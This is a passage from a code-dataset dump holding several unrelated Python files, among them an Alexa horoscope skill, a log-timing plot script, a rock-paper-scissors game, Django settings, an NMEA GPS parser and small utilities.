\"\n shouldEndSession = True\n return buildResponse({}, buildSpeechletResponse(cardTitle, speechOutput, None, shouldEndSession)) \n\n# ------------------------------------------------------------------------------\n# --------------------------- Response Builders --------------------------------\n# ------------------------------------------------------------------------------\n\ndef buildSpeechletResponse(title, output, repromptTxt, endSession):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n \n 'card': {\n 'type': 'Simple',\n 'title': title,\n 'content': output\n },\n \n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': repromptTxt\n }\n },\n 'shouldEndSession': endSession\n }\n\n\ndef buildResponse(sessionAttr , speechlet):\n return {\n 'version': '1.0',\n 'sessionAttributes': sessionAttr,\n 'response': speechlet\n }\n\n# ------------------------------------------------------------------------------\n# ---------------------------- Zodiac Information ---------------------------------\n# ------------------------------------------------------------------------------\n\nInformation={\"Aquarius\" : \"your lucky Colors are: light-blue and silver. \\\nyour lucky day is: saturday. \\\nyour lucky numbers are: 4, 7, 11, 22, and 29. \\\nyour best match for marriage and partnership is: leo. \\\nyour strengths are: inventive, humanistic, friendly, altruistic, sociable and reformative. \\\nyour weaknesses are: emotionally detached, scatterbrained, irresponsible, inability to compromise and hot tempered. \\\nyou like: fun with friends, helping others, fighting and intellectual conversation . \\\nyou dislike: being lonely, dull or boring situations, restrictions and incomplete promises. \\\nyou are shy and quiet, but on the other hand you are eccentric and energetic. you are deep thinker and highly intellectual. \",\\\n\n\n\"Pisces\": \"your lucky colors are: mauve, lilac, purple, violet and sea green. \\\nyour lucky day is: thursday. \\\nyour lucky numbers are: 3, 9, 12, 15, 18 and 24. \\\nyour best match for marriage and partnership is: virgo. \\\nyour strengths are: compassionate, artistic, intuitive, gentle, wise, adaptable and imaginative. \\\nyour weaknesses are: oversensitive, indecisive, lazy, escapist and fearful. \\\nyou like: creativity, being alone, sleeping, music, romance and swimming. \\\nyou dislike: rules and restrictions, hardwork, criticism, and being under pressure. \\\nyou are very friendly, you enjoy company of different people. you are selfless, you are always willing to help others, without hoping to get anything back. \",\\\n\n\"Aries\":\"your lucky color is: red. \\\nyour lucky day is: tuesday. \\\nyour lucky numbers are: 1, 8 and 17. \\\nyour best match for marriage and partnership is: libra. \\\nyour strengths are: courageous, determined, confident, enthusiastic, optimistic, honest and passionate. \\\nyour weaknesses are: impatient, moody, short-tempered, impulsive and aggressive. \\\nyou like: loud music, parties, friends, fights, sporting events, being outdoors and action movies. \\\nyou dislike: waiting, being disappointed and being ignored. \\\nyou are natural born leader that knows how to take charge, you are straight-forward and you have zero time for bullshit, you are ultra competitive and wont give up without one hell of a fight. you hate dull and repetitive routines. \" ,\\\n\n \n\"Taurus\":\"your lucky colors are: green and pink. \\\nyour lucky days are: friday and monday. \\\nyour lucky numbers are: 2, 6, 9, 12 and 24. 
\\\nyour best match for marriage and partnership is: scorpio. \\\nyour strengths are: steady, driven, tenacious, patient, enduring, dedicated, determined and trustworthy. \\\nyour weaknesses are: materialistic, resistant to change, fanatical, indulgent, gluttonous, possessive, stubborn and narrow-minded. \\\nyou like: gardening, cooking, music, romance, high quality clothes, beauty and harmony. \\\nyou dislike: being rushed into making a decision, uncomfortable surroundings, being pestered or annoyed. \\\nyou are practical and well-grounded, you feel the need to always be surrounded by love and beauty, turned to the material world, hedonism, and physical pleasures. you are ready to endure and stick to your choices until you reach the point of personal satisfaction. \",\\\n \n\"Gemini\":\"your lucky colors are: light-green and yellow. \\\nyour lucky day is: wednesday. \\\nyour lucky numbers are: 5, 7, 14 and 23. \\\nyour best match for marriage and partnership is: sagittarius. \\\nyour strengths are: intelligent, adaptable, agile, communicative, and informative. \\\nyour weaknesses are: talkative, exaggerating, deceptive, cunning, superficial and inconsistent. \\\nyou like: music, books, magazines, solving problems, playing games and short trips around the town. \\\nyou dislike: obsessive amounts of seriousness, boredom ,immaturity, repetition, broken promises and dullness .\\\nyou try to avoid conflict and will walk away before things get too heated, you are fiercely loyal friend, ally and lover. your mind always racing with thoughts and ideas. \" ,\\\n\n\"Cancer\":\"your lucky Color is: white. \\\nyour lucky days are: monday and thursday. \\\nyour best match for marriage and partnership is: capricorn. \\\nyour lucky numbers are: 2, 3, 15 and 20. \\\nyour strengths are: tenacious, highly imaginative, loyal, emotional, sympathetic and persuasive. \\\nyour weaknesses are: moody, pessimistic, suspicious, manipulative and insecure. \\\nyou like: money, art, home, helping loved ones and a good meal with friends. \\\nyou dislike: strangers, cruelty, being alone and negative thinking. \\\nyou are deeply intuitive and sentimental. you are very emotional and sensitive, and care deeply about matters of the family and your home. you are sympathetic and attached to people you keep close. you are very loyal and able to empathize with other people's pain and suffering. \",\\\n\n\"Leo\":\"your lucky colors are: gold, yellow and orange. \\\nyour lucky day is: sunday. \\\nyour lucky numbers are: 1, 3, 10 and 19. \\\nyour best match for marriage and partnership is: aquarius. \\\nyour strengths are: creative, passionate, generous, warm-hearted, cheerful and humorous. \\\nyour weaknesses are: arrogant, stubborn, self-centered, lazy and inflexible. \\\nyou like: theater, taking holidays, being admired, expensive things, bright colors and fun with friends. \\\nyou dislike: being ignored, facing difficult reality and not being treated like a king or queen. \\\nyou are natural born leaders. you are dramatic, creative, self-confident, dominant and extremely difficult to resist, able to achieve anything you want to in any area of life you commit to. \",\\\n\n\"Virgo\":\"your lucky colors are: grey, beige and pale-yellow. \\\nyour lucky Day is: wednesday. \\\nyour best match for marriage and partnership is: pisces. \\\nyour lucky numbers are: 5, 14, 15, 23 and 32. \\\nyour strengths are: truthful, loyal, straightforward, analytical, kind, hardworking and practical. 
\\\nyour weaknesses are: shyness, worry, obsessive and timidity. \\\nyou like: animals, healthy food, books, nature and cleanliness. \\\nyou dislike: rudeness, asking for help and acting as a leader. \\\nyou always pay attention to the smallest details and your deep sense of humanity makes you one of the most careful person. your methodical approach to life ensures that nothing is left to chance, and although you are often tender, your heart might be closed for the outer world. \",\\\n\n\"Libra\":\"your lucky colors are: pink and green. \\\nyour lucky day is: friday. \\\nyour best match for marriage and partnership is: aries. \\\nyour lucky Numbers are: 4, 6, 13, 15 and 24. \\\nyour strengths are: cooperative, diplomatic, gracious, fair-minded and social. \\\nyour weaknesses are: indecisive, unreliable, manipulative and stubborn. \\\nyou like: harmony, gentleness, balance, kindness, parting with others and outdoor activities. \\\nyou dislike: violence, injustice and crowd. \\\nyou are smart enough to learn from your mistakes and you tend to remember everything so that you don’t make the same error of judgement twice. you are also willing to be patient and wait for the right person to come along and wont just settle for the first person that shows interest. \",\\\n\n\"Scorpio\":\"your lucky colors are: scarlet, red and rust. \\\nyour lucky Day is: tuesday. \\\nyour best match for marriage and partnership is: taurus. \\\nyour lucky numbers are: 8, 11, 18 and 22. \\\nyour strengths are: resourceful, brave, passionate, determined and dedicated. \\\nyour weaknesses are: distrusting, jealous, secretive and violent. \\\nyou like: truth, facts, being loyal, being right, mysteries and challenges. \\\nyou dislike: dishonesty, revealing secrets and mind games. \\\nyou are passionate and assertive. you are determined and decisive, and will research until you find out the truth. you are a great leader, always aware of the situation. \\\nyou live to experience and express emotions. you keep secrets, whatever they may be.\",\\\n\n\"Sagittarius\":\"your lucky color is: blue. \\\nyour lucky Day is: thursday. \\\nyour best match for marriage and partnership is: gemini. \\\nyour lucky numbers are: 3, 7, 9, 12 and 21. \\\nyour strengths are: generous, idealistic and great sense of humor. \\\nyour weaknesses are: inability to fulfill promises, lacks patience and lack of tact. \\\nyou like: freedom, travel, philosophy and being outdoors. \\\nyou dislike: dishonesty, pessimism, restrictions and norms. \\\nyou are curious and energetic, you are biggest traveller. your open mind and philosophical view motivates you to wander around the world in search of the meaning of life. \\\nyou are extrovert, optimistic and enthusiastic, and like changes. you can transform your thoughts into concrete actions and you can do anything to achieve your goals. \",\\\n\n\"Capricorn\":\"your lucky colors are: brown and black. \\\nyour lucky day is: saturday. \\\nyour best match for marriage and partnership is: cancer. \\\nyour lucky numbers are: 4, 8, 13 and 22. \\\nyour strengths are: responsible, disciplined, self-control, determined and good managing skills. \\\nyour weaknesses are: pessimistic, greedy, cynical, fearful, ruthless in achieving a goal and rigid. \\\nyou like: family, traditions, music and responsibility. \\\nyou dislike: gossip, laziness, being angry and wasting time. \\\nyou are very serious by nature. 
you possess an inner state of independence that enables significant progress both in your personal and professional lives. you are master of self-control and have the ability to lead the way, make solid and realistic plans, and manage many people who work for you at any time. you learn from your mistakes and get to the top based solely on your experience and expertise. \"}\n","repo_name":"mohitarora3/Horoscope-3.1","sub_path":"horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":18976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40201718468","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport os, sys\nimport fnmatch\n\n\ndef client(path):\n index = 0\n result = []\n with open(path, 'r') as f:\n for line in f:\n if 'WARNING' in line and 'Start of request bunch' in line:\n result.append([])\n if 'WARNING' in line and 'Elapsed' in line:\n values = line[line.find('Elapsed')+9:line.find('Elapsed')+23].split(':')\n values2 = values[2].split('.')\n mean = int(values2[0]) + int(values2[1])/1000000\n result[index].append(round(mean * 1000))\n if 'WARNING' in line and 'End of request bunch' in line:\n index += 1\n # print(result)\n return result\n\n\ndef frontend(path):\n result = []\n with open(path, 'r') as f:\n for line in f:\n if 'WARNING - Success GET' in line:\n values = line[line.find('Elapsed') + 9:line.find('Elapsed') + 23].split(':')\n values2 = values[2].split('.')\n mean = int(values2[0]) + int(values2[1]) / 1000000\n result.append(round(mean * 1000))\n # print(result)\n return result\n\n\nclientdata = []\nfrontdata = []\n\nfor file in os.listdir('./Logs'):\n if fnmatch.fnmatch(file, 'client*'):\n clientdata = client(os.path.join(os.path.abspath('.'), 'Logs', file))\n elif fnmatch.fnmatch(file, 'frontend*'):\n frontdata = frontend(os.path.join(os.path.abspath('.'), 'Logs', file))\n\n\n# =======================================================================================================\ndef client_plot():\n properwidth = 12 # Correct if number of requests in client has changed\n index = 0\n # Fill in zeros if some series' length < properwidth\n for series in clientdata:\n print(series)\n if len(series) < properwidth:\n for t in range(0, properwidth-len(series)):\n clientdata[index].append(0)\n index += 1\n\n # Transpose clientdata\n clientdata_tr = [list(row) for row in zip(*clientdata)]\n print(\"===============\")\n for row in clientdata_tr:\n print(row)\n\n\n # задай столбцы\n rawdata = {'req{0}'.format(c) : clientdata_tr[c-1] for c in range(1, len(clientdata_tr)+1)}\n rawdata['req0'] = ['Launch {0}'.format(c) for c in range(0, len(clientdata))]\n\n df = pd.DataFrame(rawdata, columns=['req{0}'.format(c) for c in range(0, len(clientdata_tr)+1)])\n\n\n # Setting the positions and width for the bars\n pos = list(range(len(clientdata)))\n width = 0.025\n\n # Plotting the bars\n fig, ax = plt.subplots(figsize=(10,5))\n\n # Create a bar with pre_score data,\n # in position pos,\n counter = 0\n for x in range(1, len(clientdata_tr)+1):\n plt.bar([p + width*(x-1) for p in pos],\n # using df['mid_score'] data,\n df['req{0}'.format(x)],\n # of width\n width,\n # with alpha 0.5\n alpha=0.5,\n # with color\n color='#F78F1E',\n # with label the second value in first_name\n # label=df['columns'][x])\n label=str(x))\n\n # Set the y axis label\n ax.set_ylabel('Время выполнения запроса (ms)')\n\n # Set the chart's title\n ax.set_title('Клиент')\n\n # Set the position of 
the x ticks\n ax.set_xticks([p + 1.5 * width for p in pos])\n\n # Set the labels for the x ticks\n ax.set_xticklabels(df['req0'])\n\n # Setting the x-axis and y-axis limits\n plt.xlim(min(pos)-width, max(pos)+width*4)\n plt.ylim([0, max( [max(l) for l in clientdata_tr] )])\n\n # Adding the legend and showing the plot\n # plt.legend(['Pre Score', 'Mid Score', 'Post Score'], loc='upper left')\n plt.grid()\n plt.show()\n\n\ndef frontend_plot():\n fig, ax = plt.subplots(figsize=(10, 5))\n N = len(frontdata)\n x = range(N)\n width = 1 / 1.5\n plt.bar(x, frontdata, width, color='#F78F1E')\n ax.set_ylabel('Время выполнения запроса (ms)')\n ax.set_title('Frontend-узел')\n plt.grid()\n # fig = plt.gcf()\n plt.show()\n\n\nfrontend_plot()\nclient_plot()\n","repo_name":"nmatkheev/SampleRabbitt","sub_path":"time_plot.py","file_name":"time_plot.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12632131743","text":"import random\r\n\r\ndef play_again():\r\n\toption=input('To continue type [Y/Yes]\\n').lower()\r\n\tif option=='yes' or option=='y':\r\n\t\tperform_operation()\r\n\telse:\r\n\t\tpass\r\n\r\ndef perform_operation():\r\n\tchoice=['rock','paper','scissor']\r\n\tcomputer=choice[random.randint(0,2)]\r\n\tprint('Rock Paper Scissor')\r\n\tplayer=input('Your choice: ').lower()\r\n\twhile player not in choice:\r\n\t\tprint('Choose rock, paper or scissor')\r\n\t\tplayer=input('Your choice: ').lower()\r\n\tprint('Computer choice: ',computer)\r\n\r\n\tif player==computer:\r\n\t\tprint('Draw')\r\n\telif player=='rock' and computer=='paper':\r\n\t\tprint('Computer wins')\r\n\telif player=='rock' and computer=='scissor':\r\n\t\tprint('You win')\r\n\telif player=='paper' and computer=='rock':\r\n\t\tprint('You win')\r\n\telif player=='paper' and computer=='scissor':\r\n\t\tprint('Computer wins')\r\n\telif player=='scissor' and computer=='paper':\r\n\t\tprint('You win')\r\n\telif player=='scissor' and computer=='rock':\r\n\t\tprint('Computer wins')\t\r\n\r\n\tplay_again()\r\n\r\nif __name__ == '__main__':\r\n\tperform_operation()","repo_name":"ndvishruth/Rock-Paper-Scissor","sub_path":"rock.py","file_name":"rock.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39818571006","text":"g = lambda: [*map(int, input().split())]\r\n\r\ndef sieve_of_eratosthenes(N):\r\n isprime = [True] * N\r\n spf = [None] * N\r\n primes = []\r\n for i in range(2, N):\r\n if isprime[i]:\r\n primes.append(i)\r\n spf[i] = i\r\n\r\n j = 0\r\n while (j < len(primes) and\r\n i * primes[j] < N and\r\n primes[j] <= spf[i]):\r\n \r\n isprime[i * primes[j]] = False\r\n spf[i * primes[j]] = primes[j]\r\n j += 1\r\n return primes\r\n\r\nprimes = sieve_of_eratosthenes(1000)\r\nA, B = g()\r\nyt = set(num for num in primes if A <= num <= B)\r\nC, D = g()\r\nyj = set(num for num in primes if C <= num <= D)\r\n\r\nif len(yt) + (len(yt & yj) & 1) > len(yj):\r\n print('yt')\r\nelse:\r\n print('yj')","repo_name":"juwkim/boj","sub_path":"백준/Silver/25632. 
소수 부르기 게임/소수 부르기 게임.py","file_name":"소수 부르기 게임.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74895869685","text":"import os\r\n\r\ndef data_split(path, new_file_path, radio):\r\n video_list = [x for x in open(path)]\r\n # if not os.path.exists(new_file_path):\r\n count = 0\r\n new_list = []\r\n for line in video_list:\r\n count += 1\r\n if count % radio == 0:\r\n new_list.append(line)\r\n with open(new_file_path, 'w') as f:\r\n for item in new_list:\r\n f.write(\"%s\" % item)\r\n\r\nif __name__ == '__main__':\r\n radio = 10\r\n path = \"../datasets/lists/kinetics-400/ssd_kinetics_video_trainlist.txt\"\r\n new_file_path = \"../datasets/lists/kinetics-400/ssd_kinetics_video_trainlist_{}of{}.txt\".format(1, radio)\r\n data_split(path, new_file_path, radio)","repo_name":"FingerRec/BE","sub_path":"src/Contrastive/utils/data_process/gen_sub_dataset.py","file_name":"gen_sub_dataset.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"76"} +{"seq_id":"33172581687","text":"import time\nfrom datetime import datetime, timedelta, timezone\n\n\nDT_AWARE = \"%m/%d/%y %I:%M:%S %p %Z\"\nDT_NAIVE = \"%m/%d/%y %I:%M:%S %p\"\n\n\ndef utc_now():\n return datetime.now(timezone.utc).replace(microsecond=0)\n\n\ndef localized_dt_string(dt, use_tz=None):\n if not dt.tzinfo and not use_tz:\n return dt.strftime(DT_NAIVE)\n if not dt.tzinfo:\n return dt.replace(tzinfo=use_tz).strftime(DT_AWARE)\n return (\n dt.astimezone(use_tz).strftime(DT_AWARE)\n if use_tz\n else dt.strftime(DT_AWARE)\n )\n\n\ndef get_local_utcoffset():\n utc_offset = timedelta(seconds=time.localtime().tm_gmtoff)\n return timezone(offset=utc_offset)\n\n\ndef make_tzaware(dt, use_tz=None, localize=True):\n if not use_tz:\n use_tz = get_local_utcoffset()\n return dt.astimezone(use_tz) if localize else dt.replace(tzinfo=use_tz)\n\n\ndef get_gmt_timezone(localtime: str):\n try:\n dt = datetime.fromisoformat(localtime).utcoffset()\n gmt_offset = dt.total_seconds() // 3600\n gmt_timezone = \"{0:+3d}\".format(int(gmt_offset)).lstrip()\n if int(gmt_timezone) > 12 or int(gmt_timezone) < -12:\n return None\n\n return gmt_timezone\n except ValueError:\n return None\n","repo_name":"wiky-avis/movies_auth_service","sub_path":"src/common/datetime_util.py","file_name":"datetime_util.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35667691123","text":"import numpy as np\nimport random\n\n\nclass Card:\n\n def __init__(self):\n a = [1, 10, 20, 30, 40, 50, 60, 70, 80]\n b = [10, 20, 30, 40, 50, 60, 70, 80, 91]\n card_start = np.zeros((3, 9), dtype=int)\n for i in range(9):\n array_start = np.array(range(a[i], b[i]))\n random.shuffle(array_start)\n new_list = array_start[:3]\n for j in range(3):\n card_start[j, i] = new_list[j]\n # Создадим маску по пять чисел в каждой строке\n mask = np.zeros((3, 9), dtype=int)\n array_mask = np.array(range(9))\n random.shuffle(array_mask)\n new_array = array_mask[:5]\n for i in new_array:\n mask[0, i] = 1\n for i in range(9):\n mask[2, i] = not mask[0, i]\n f = random.choice(new_array)\n mask[2, f] = 1\n array_end = np.array(range(9))\n array_end_f = np.delete(array_end, f)\n random.shuffle(array_end_f)\n new_array = array_end_f[:5]\n for i in new_array:\n mask[1, i] = 1\n # Формируем карточку\n card_end = np.zeros((3, 9), 
dtype=int)\n for i in range(3):\n for j in range(9):\n if mask[i, j]:\n card_end[i, j] = card_start[i, j]\n\n self.image = card_end\n\n def cprint(self, player):\n \"\"\"\n Выводим на экран карточку конкретного игрока\n :param player:\n :return:\n \"\"\"\n print(f'---Карточка игрока {player.upper()}---')\n for i in range(3):\n for j in range(9):\n if self.image[i, j]:\n if j == 0:\n print(' ', end=' ')\n if self.image[i, j] == -1:\n if j == 0:\n print('*', end=' ')\n else:\n print('**', end=' ')\n else:\n print(str(self.image[i, j]), end=' ')\n else:\n if j == 0:\n print('', end=' ')\n print(' ', end=' ')\n print()\n print('-' * 29)\n\n def creplace(self, num):\n \"\"\"\n Вместо номера в карточке записываем (-1)\n :param num:\n :return:\n \"\"\"\n for i in range(3):\n for j in range(9):\n if self.image[i, j] == num:\n self.image[i, j] = -1\n\n def cmax(self):\n \"\"\"\n Проверяем что максимальное значение числа в карточке не больше нуля\n :return:\n \"\"\"\n return self.image.max() <= 0\n\n def isnum(self, numb):\n \"\"\"\n Проверяем, есть ли выпавший номер (num) в карточке игрока.\n :param num:\n :return:\n \"\"\"\n return numb in self.image\n\n\nif __name__ == '__main__':\n crd = Card()\n player = \"TEST\"\n crd.cprint(player)\n num = random.choice(range(1, 91))\n print(num)\n crd.creplace(num)\n crd.cprint(player)\n print(crd.cmax())\n print(crd.isnum(num))\n","repo_name":"pythonlearningtmn/lesson9loto","sub_path":"class_loto.py","file_name":"class_loto.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23879282673","text":"from marshmallow import ValidationError\n\nfrom schemas.rfq_schema import RfqSchema\n\n\ndef validate_rfq(rfq: str):\n validated_data = None\n error = None\n\n try:\n if rfq.count(\" \") != 3: # 4 entries separated by 3 spaces\n raise ValueError\n\n type_, instrument, size, email = rfq.split()\n\n validated_data = RfqSchema().load(\n {\n \"type\": type_,\n \"instrument\": instrument,\n \"size\": size,\n \"email\": email,\n }\n )\n\n except ValueError:\n error = (\n \"Invalid RFQ format! 
Please enter a string with \"\n 'this format: \" \"'\n )\n\n except ValidationError as err:\n error = str(err.messages)\n\n return validated_data, error\n","repo_name":"nedevic/InstrumentPriceChecker","sub_path":"validators/rfq.py","file_name":"rfq.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20421007911","text":"import sys, os\nfrom PIL import Image\nimport glob\n\nfGIF = \"animGIF.gif\"\nH = 720\nW = 1270\nn = 1\n# Create the frames\nframes = []\nimages = glob.glob(\"*.jpg\")\n\nfor i in images:\n newImg = Image.open(i)\n# if (len(sys.argv) < 2 and n > 0):\n# newImg = newImg.resize((W, H))\n frames.append(newImg)\n \n# Save into a GIF file that loops forever: duration is in milli-second\nframes[0].save(fGIF, format='GIF', append_images=frames[1:],\n save_all=True, duration=200, loop=0)","repo_name":"lonnieraymccollister/astrotools","sub_path":"gifmaker.py","file_name":"gifmaker.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29868317344","text":"\"\"\" Algoritmo de ordenamiento por selección.\"\"\"\n\n# INICIO\n\n# Inicialización de variables.\ncalif = [None]*6\ncalif_ord = [None]*6\n\n# Entrada de datos:\nfor estudiante in range(6):\n calif[estudiante] = float(input(\"Dame una calificación: \\n\"))\n\n\n# Ordenamiento por selección:\nfor paso in range(6):\n minima = 0\n for estudiante in range(1, 6):\n if (calif[estudiante] < calif[minima]):\n minima = estudiante\n calif_ord[paso] = calif[minima]\n calif[minima] = 11\n# Fin del ordenamiento.\n\n# Se despliega el vector ordenado.\nprint(\"\\nEl orden es : \\n\", calif_ord)\n \n\n# FIN\n","repo_name":"ja12as/Ejercicios-de-python-basicos","sub_path":"Ejemplos Cap 6/Ejemplo6_16.py","file_name":"Ejemplo6_16.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43130633427","text":"# Django settings for src project.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'opentrackings',\n 'USER': 'otadmin',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n 'OPTIONS': {\"init_command\": \"SET storage_engine=INNODB\"},\n }\n}\n\nimport os\n\nSITE_ROOT = os.path.realpath(os.path.abspath(os.path.join(os.path.realpath(os.path.dirname(__file__)), '..')))\nMEDIA_ROOT = os.path.realpath(os.path.abspath(os.path.join(SITE_ROOT, 'media')))\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/New_York'\n\n# Language code for this installation. 
All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = False\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = False\n\nSITE_URL = ''\nMEDIA_URL = '%smedia/' % SITE_URL\n\n# Absolute path to the directory that holds media.\nMEDIA_ROOT = '/www/opentrackings/media/'\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\nMEDIA_URL = 'http://opentrackings.com/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\nADMIN_MEDIA_PREFIX = '/django-admin-media/'\n\nLOGIN_URL = 'account/signin/'\nLOGIN_REDIRECT_URL = \"/\"\nACCOUNT_ACTIVATION_DAYS = 10\n\nOPENID_SREG = {\n \"required\": ['fullname', 'country']\n}\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'ABCDEFGHIJKLMNOPQRST1234567890'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django_authopenid.middleware.OpenIDMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.core.context_processors.request',\n 'django.core.context_processors.auth',\n 'django.core.context_processors.media',\n 'django_authopenid.context_processors.authopenid',\n)\n\nROOT_URLCONF = 'opentrackings.urls'\n\nTEMPLATE_DIRS = (\n os.path.realpath(os.path.abspath(os.path.join(SITE_ROOT, 'opentrackings', 'templates'))),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'opentrackings.apps.opentrackings',\n 'uni_form',\n 'registration',\n 'django_authopenid',\n)\n","repo_name":"tarequeh/opentrackings","sub_path":"src/opentrackings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6795127477","text":"import pandas as pd\nimport sys\nimport os\nGPGLL={\n \"Latitude\":[],\n \"N_S Indicator\":[],\n \"Longitude\":[],\n \"E_W Indicator\":[],\n \"UTC time\":[],\n \"Status\":[],\n \"Mode\":[],\n \"Checksum\":[]\n }\nGPRMC={\n \"UTC time\":[],\n \"Status\":[],\n \"Latitude\":[],\n \"N_S Indicator\":[],\n \"Longitude\":[],\n \"E/W Indicator\":[],\n \"Speed over ground\":[],\n \"Course over ground\":[],\n \"Date\":[],\n \"Magnetic variation,degrees\":[],\n \"Magnetic variation,direction\":[],\n \"Mode\":[],\n \"Checksum\":[]\n}\nGPVTG={\n \"Course\":[],\n \"Reference\":[],\n \"Course2\":[],\n \"Reference2\":[],\n \"Speed(knots)\":[],\n \"Unit(knots)\":[],\n \"Speed(kilometers)\":[],\n \"Unit(kilometers)\":[],\n \"Mode\":[],\n \"Checksum\":[]\n}\nGPGGA={\n \"UTC 
time\":[],\n \"Latitude\":[],\n \"N_S Indicator\":[],\n \"Longitude\":[],\n \"E_W Indicator\":[],\n \"Position Fix Indicator\":[],\n \"Satellites used\":[],\n \"HDOP\":[],\n \"MSL Altitude\":[],\n \"Units(MSL)\":[],\n \"Geoid separation\":[],\n \"Units(Geoid)\":[],\n \"Age of diff. corr\":[],\n \"Diff.ref.station ID\":[],\n \"Checksum\":[]\n}\n \ndef fill_x_list(gps_sentence,listf):\n\n data=open(sys.argv[1],'r')\n count=0\n while True:\n\n line=data.readline()\n line=line.strip()\n\n if (line[:6]==gps_sentence):\n count+=1\n\n line=line.split(',',-1)\n checksum= line[-1].split(\"*\")[1]\n line[-1] =line[-1].split(\"*\")[0]\n line.append(checksum)\n\n for i in range(1,len(line)):\n namekey=tuple(listf.items())[i-1][0]\n listf[namekey].append(line[i])\n\n if not line:\n break\n \n print(\"Quantity of:\",gps_sentence,'sentences',str(count),sep=None)\n data.close()\n return listf\n\nGPVTG=fill_x_list(\"$GPVTG\",GPVTG)\nGPGGA=fill_x_list(\"$GPGGA\",GPGGA)\nGPMRC=fill_x_list(\"$GPRMC\",GPRMC)\nGPGLL=fill_x_list(\"$GPGLL\",GPGLL)\n\nsave_path=sys.argv[2]+'/output/'\n\nif not os.path.exists(save_path):\n os.makedirs(save_path)\n\ndata_csv=pd.DataFrame.from_dict(data=GPGLL,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPGLL.csv')\ndata_csv=pd.DataFrame.from_dict(data=GPVTG,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPVTG.csv')\ndata_csv=pd.DataFrame.from_dict(data=GPMRC,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPMRC.csv')\ndata_csv=pd.DataFrame.from_dict(data=GPGGA,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPGGA.csv')\n","repo_name":"janc18/nmea_text_to_csv_converter","sub_path":"parse_gps_sentences.py","file_name":"parse_gps_sentences.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18925644971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# - 61 unisort\n# - 60 bisort\n# \n# all covered in the code: tools\n\n# In[1]:\n\n\nfrom tools.crosssection import *\n\n\n# ### read data\n\n# In[2]:\n\n\nfile = 'data_Jan2021/chars60/rank/chars60_rank_imputed.pkl'\ndf = read_pickle_file(file)\n\n# file = 'data_Jan2021/chars60/raw/chars60_raw_imputed.pkl'\n# df_raw = read_pickle_file(file)\n\n\n# In[3]:\n\n\ndf.columns\n\n\n# In[4]:\n\n\nchar_list = ['me',\n 'mom6m', 'acc', 'beta', 'bm_ia',\n 'herf', 